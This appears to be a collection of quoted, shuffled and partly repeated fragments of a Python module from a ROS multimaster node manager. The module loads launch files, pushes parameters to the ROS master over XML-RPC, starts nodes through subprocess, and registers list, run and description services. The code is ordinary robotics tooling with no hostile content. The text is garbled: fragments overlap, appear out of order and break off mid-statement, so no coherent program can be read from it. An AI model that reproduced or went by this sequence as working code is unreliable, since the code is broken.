"node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign node",
"self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback",
"None): args.append('__cwd:=%s' % n.cwd) # add remaps for remap in n.remap_args: args.append('%s:=%s' %",
"entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',')",
"this as it causes too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key,",
"ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine",
"caller about a new configuration. if self.runService is not None: self.runService.shutdown('reload config') self.runService",
"result[machine_name]: result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type':",
"self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error",
"= self._decode(entry[4]) break except: pass # get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc()",
"in the documentation and/or other materials provided # with the distribution. # *",
"[%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code, msg, _ in r:",
"StartException(str(e)) # handle different result types str or array of string if sys.version_info[0]",
"req): self.load(2.) return [] # def rosservice_load_launch(self, req): # ''' # Load the",
"forms, with or without # modification, are permitted provided that the following conditions",
"machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns,",
"EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,",
"parameter found, assign node to the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value:",
"in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter self._run_node(popen_cmd,",
"the launchfile info local namespace sys.argv = list(argv) # set the global environment",
"for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0]",
"n.cwd) # add remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) #",
"launch file # ''' # try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) #",
"'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the master",
"'description' : str, 'nodes' : [str]))))} ''' result = dict() capabilies_descr = dict()",
"Load parameters onto the parameter server \"\"\" try: import xmlrpclib except ImportError: import",
"LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None",
"Neither the name of Fraunhofer nor the names of its # contributors may",
"ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names import",
"IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED.",
"if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch)",
"else: string_types = (str,) if isinstance(cmd, string_types): cmd = [cmd] if cmd is",
"def rosservice_load_launch(self, req): # ''' # Load the launch file # ''' #",
"ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF",
"while start %s: %s\", n, e) self.do_autostart = False def _decode(self, val): '''",
"= n.env_args prefix = n.launch_prefix if n.launch_prefix is not None else '' args",
"server. ''' params = dict() for param, value in self.roscfg.params.items(): params[param] = value",
"rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService =",
"[] '''@ivar: the list with names of nodes with name spaces.''' self.sensors =",
"cap = Capability() cap.namespace = ns cap.name = group cap.type = descr_dict['type'] cap.images",
"then one launch file is found, take the first one launch_file = paths[0]",
"n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables respawn_params =",
"services to inform the caller about a new configuration. if self.runService is not",
"# machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args: # env[len(env):]",
"delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer =",
"if not cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group' parameter found, assign",
"API. @return: ROS master URI @rtype: C{str} ''' try: import rospkg.distro distro =",
"SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF",
"one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s",
"the ROS services # HACK to let the node_manager to update the view",
"the capabilities description # use two separate loops, to create the description list",
"[] def rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self, req): # '''",
"may be used to endorse or promote products derived # from this software",
"%s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from environment new_env",
"if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter",
"_get_node(self, pkg, filename): cmd = None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException",
"DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE",
"result def _masteruri_from_ros(self): ''' Returns the master URI depending on ROS distribution API.",
"n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start",
"# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #",
"cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not",
"waiting for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart))",
"'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get",
"more then one launch file is found, take the first one launch_file =",
", ScreenHandlerException class LoadException(Exception): ''' The exception throwing while searching for the given",
"-> ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images':",
"above # copyright notice, this list of conditions and the following # disclaimer",
"in result[machine_name]: result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] =",
"dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass # get the sensor",
"new_env = dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass",
"= param_server_multi() for code, msg, _ in r: if code != 1: raise",
"= descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) #",
"= threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts try: self._pending_starts.remove(node) except: pass",
"dict() if self.roscfg is not None: # get the capabilities description # use",
"pkg)) return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value)",
"pass class StartException(Exception): ''' The exception throwing while run a node containing in",
"types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types): cmd = [cmd] if cmd",
"# contributors may be used to endorse or promote products derived # from",
"_run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node)",
"for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri #",
"# #2468 unify clear params to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(),",
"param) else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0]",
"= rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list): self.argv =",
"= self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine =",
"p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0 and",
"added: ns = cap_ns # add new group in the namespace of the",
"(remap[0], remap[1])) # masteruri = self.masteruri # if n.machine_name and not n.machine_name ==",
"{'type': '', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self):",
"cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param",
"for n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while",
"None self.nodes = [] # the name of nodes with namespace self.sensors =",
"more then one launch file with the same name found in the package,",
"= False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the capability",
"`%s` is ignored!' % topic) topic = '' elif not rosgraph.names.is_global(topic): topic =",
"not None: self.runService.shutdown('reload config') self.runService = None if self.listService is not None: self.listService.shutdown('reload",
"not cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group' parameter found, assign node",
"@rtype: C{str} @raise LoadException: if the given file is not found ''' launch_file",
"# All rights reserved. # # Redistribution and use in source and binary",
"node_fullname # find the capability group parameter in namespace while cap_param not in",
"cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run",
"provided # with the distribution. # * Neither the name of Fraunhofer nor",
"'description'] -> ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]),",
"@classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto the parameter server",
"print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore\", param) else: for entry",
"if self.load_params_at_start: self.loadParams() # initialize the ROS services # HACK to let the",
"rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return",
"= {'type': '', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def",
"= shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd))) # remove",
"the string entry from system default coding to unicode. @param val: the string",
"set, try to find the launch file in the given package if package:",
"# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS",
"self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service",
"Start the timer for waiting for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd,",
"modification, are permitted provided that the following conditions # are met: # #",
"except: pass # print the current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear()",
"LoadException('File %s in package [%s] not found!' % (path, package)) def rosservice_list_nodes(self, req):",
"currently loaded configuration. @param node: the name of the node @type node: C{str}",
"= roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP)",
"for the given launch file. ''' pass class StartException(Exception): ''' The exception throwing",
"cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args)))",
"self.listService.shutdown('reload config') self.listService = None self.nodes = [] # the name of nodes",
"try: return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node,",
"''' self.description_response = ListDescriptionResponse() # variables to print the pending autostart nodes self._pending_starts",
"> 0: # if more then one launch file is found, take the",
"autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd = None try:",
"except: pass # add node environment parameter for k, v in n.env_args: new_env[k]",
"for p in params.itervalues(): # suppressing this as it causes too much spam",
"be tacked. @param path: the file name of the launch file @type path:",
"= self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime']",
"v in n.env_args: new_env[k] = v # the ROS_NAMESPACE environment is used in",
"available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the ROS",
"file. ''' pass class StartException(Exception): ''' The exception throwing while run a node",
"in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home()",
"of conditions and the following # disclaimer in the documentation and/or other materials",
"and C{capability_group} parameter and creates dictionary for grouping the nodes. @return: the capabilities",
"HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,",
"causes too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r =",
"pass return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value)",
"if len(cmd) > 1: raise StartException('Multiple executables are found! The first one was",
"p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'],",
"respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d'",
"return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls,",
"self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for a",
"threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package",
"not None else '' args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if",
"self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService =",
"getPath(self, path, package=''): ''' Searches for a launch file. If package is given,",
"exclude list, skip autostart\", n.name) return # env = n.env_args prefix = n.launch_prefix",
"node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return [] # def",
"ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT",
"'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images': [],",
"result = val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return result",
"1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns,",
"as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style xmlrpc",
"machine_name = item.machine_name if item.machine_name is not None and not item.machine_name == 'localhost'",
"# variables to print the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed =",
"# remove the 'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ) try: for",
"OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF",
"len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd = None try: cmd = roslib.packages.find_node(pkg,",
"= xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this as it causes too",
"@raise StartException: if an error occurred while start. ''' if not self.parameter_loaded: self.loadParams()",
"rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and",
"path depending on ROS distribution API. @return: ROS HOME path @rtype: C{str} '''",
"for ns, group_dict in ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap",
"autostart=False): ''' Start the node with given name from the currently loaded configuration.",
"for param, value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri,",
"self.runService = None if self.listService is not None: self.listService.shutdown('reload config') self.listService = None",
"topic = '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required",
"import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc())",
"sys.version_info[0] <= 2: import types string_types = types.StringTypes else: string_types = (str,) if",
"int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self):",
"if self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None:",
"stored in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' :",
"rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv]",
"cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group' parameter found, assign node to",
"found, take the first one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return",
"result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'],",
"delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1:",
"self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd",
"False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass",
"t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: #",
"result def getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities} and C{capability_group} parameter",
"and binary forms, with or without # modification, are permitted provided that the",
"name from the currently loaded configuration. @param node: the name of the node",
"for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code, msg,",
"cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart",
"'description'] -> ignore\", param) else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', ''))",
"self.listService = None self.nodes = [] # the name of nodes with namespace",
"is None): args.append('__cwd:=%s' % n.cwd) # add remaps for remap in n.remap_args: args.append('%s:=%s'",
"format, expected: ['name', 'type', 'images', 'description'] -> ignore\", param) else: for entry in",
"self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args: # env[len(env):] = machine.env_args #",
"to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() #",
"working path, Default: the package of the node cwd = self.get_ros_home() if not",
"self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns, group_dict in",
"return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService is",
"@return: the capabilities description stored in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type'",
"inform the caller about a new configuration. if self.runService is not None: self.runService.shutdown('reload",
"IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR",
"rospy import shlex import std_srvs.srv import subprocess import sys import threading from .screen_handler",
"to update the view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start()",
"'', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): '''",
"the launch file # ''' # try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv)",
"self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn:",
"% self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart',",
"the given package if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0:",
"'' self.__lock = threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\"",
"error ''' result = val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass",
"launch file with the same name found in the package, the first one",
"'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay",
"IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function",
"self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package:",
"return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay')",
"if not (n.cwd is None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif",
"file name of the launch file @type path: C{str} @param package: the package",
"start. ''' if not self.parameter_loaded: self.loadParams() n = None for item in self.roscfg.nodes:",
"the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if",
"def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay =",
"''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self,",
"= rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list with",
"= threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if start_now: ps =",
"as': %s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from environment",
"and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] = dict()",
"IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY",
"'respawn') # set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max']",
"to inform the caller about a new configuration. ''' self.description_response = ListDescriptionResponse() #",
"one launch file with the same name found in the package, the first",
"and start_delay > 0: start_now = False # start timer for delayed start",
"False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start:",
"getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities} and C{capability_group} parameter and creates",
"_get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node,",
"result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result",
"inform the caller about a new configuration. ''' self.description_response = ListDescriptionResponse() # variables",
"# copyright notice, this list of conditions and the following # disclaimer in",
"%s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not",
"% node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in",
"cmd is None or len(cmd) == 0: raise StartException('%s in package [%s] not",
"for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start()",
"os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the",
"string entry from system default coding to unicode. @param val: the string coding",
"not (n.cwd is None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd",
"multiple nodes, invalid package raise StartException(str(e)) except Exception as e: raise StartException(str(e)) #",
"group if not cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group' parameter found,",
"@rtype: C{unicode} or original on error ''' result = val.replace(\"\\\\n \", \"\\n\") try:",
"print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\",",
"and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP",
"''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes for item in",
"roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto",
"self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) !=",
"= self._get_node(n.package, n.type) # determine the current working path, Default: the package of",
"param_server_multi() # for code, msg, _ in r: # if code != 1:",
"if the C{file} is an absolute path @type package: C{str} @return: the absolute",
"self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] =",
"and not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support?",
"== topic: start_now = True break if not start_now: # Start the timer",
"Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All",
"value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self,",
"'''@ivar: The service will be created on each load of a launch file",
"invalid package raise StartException(str(e)) except Exception as e: raise StartException(str(e)) # handle different",
"cwd, env, node, autostart)) start_timer.start() if start_now and autostart and start_delay > 0:",
"req): ''' Callback for the ROS service to start a node. ''' self.runNode(req.node)",
"OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE,",
"2: import types string_types = types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types):",
"a launch file to inform the caller about a new configuration. ''' self.description_response",
"cap_ns = node_fullname # find the capability group parameter in namespace while cap_param",
"rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader =",
": [(sensor type, sensor name, sensor description), ...])}''' self.robot_descr = ('', '', '')",
"= '' self.__lock = threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file:",
"OF SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv",
"C{str} @raise LoadException: if the given file is not found ''' launch_file =",
"''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4])",
"'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import",
"the current description. ''' return self.description_response def loadParams(self): ''' Loads all parameter into",
"respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0:",
"met: # # * Redistributions of source code must retain the above copyright",
"rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False):",
"name : [(sensor type, sensor name, sensor description), ...])}''' self.robot_descr = ('', '',",
"if not machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group, descr_dict",
"except: # import traceback # print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams()",
"the launch file or an empty string, if the C{file} is an absolute",
"rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try:",
"# multiple nodes, invalid package raise StartException(str(e)) except Exception as e: raise StartException(str(e))",
"launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader()",
"package)) def rosservice_list_nodes(self, req): ''' Callback for the ROS service to get the",
"master Name)', 'type', 'name', 'images', 'description'] -> ignore\", param) else: for entry in",
"self.__lock: try: if self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService",
"the nodes. @return: the capabilities description stored in this configuration @rtype: C{dict(machine :",
"except roslib.packages.ROSPkgException as e: # multiple nodes, invalid package raise StartException(str(e)) except Exception",
"''' Returns the ROS HOME path depending on ROS distribution API. @return: ROS",
"FKIE/US, <NAME> # All rights reserved. # # Redistribution and use in source",
"ns not in result[machine_name]: result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]: try:",
"list with node names for item in self.roscfg.nodes: if item.machine_name and not item.machine_name",
"Name)', 'type', 'name', 'images', 'description'] -> ignore\", param) else: for entry in p.value:",
"the launch file for C{capabilities} and C{capability_group} parameter and creates dictionary for grouping",
"capabilies_descr = dict() if self.roscfg is not None: # get the capabilities description",
"environment new_env = dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del new_env[k] except:",
"# * Neither the name of Fraunhofer nor the names of its #",
"% respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd",
"SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS",
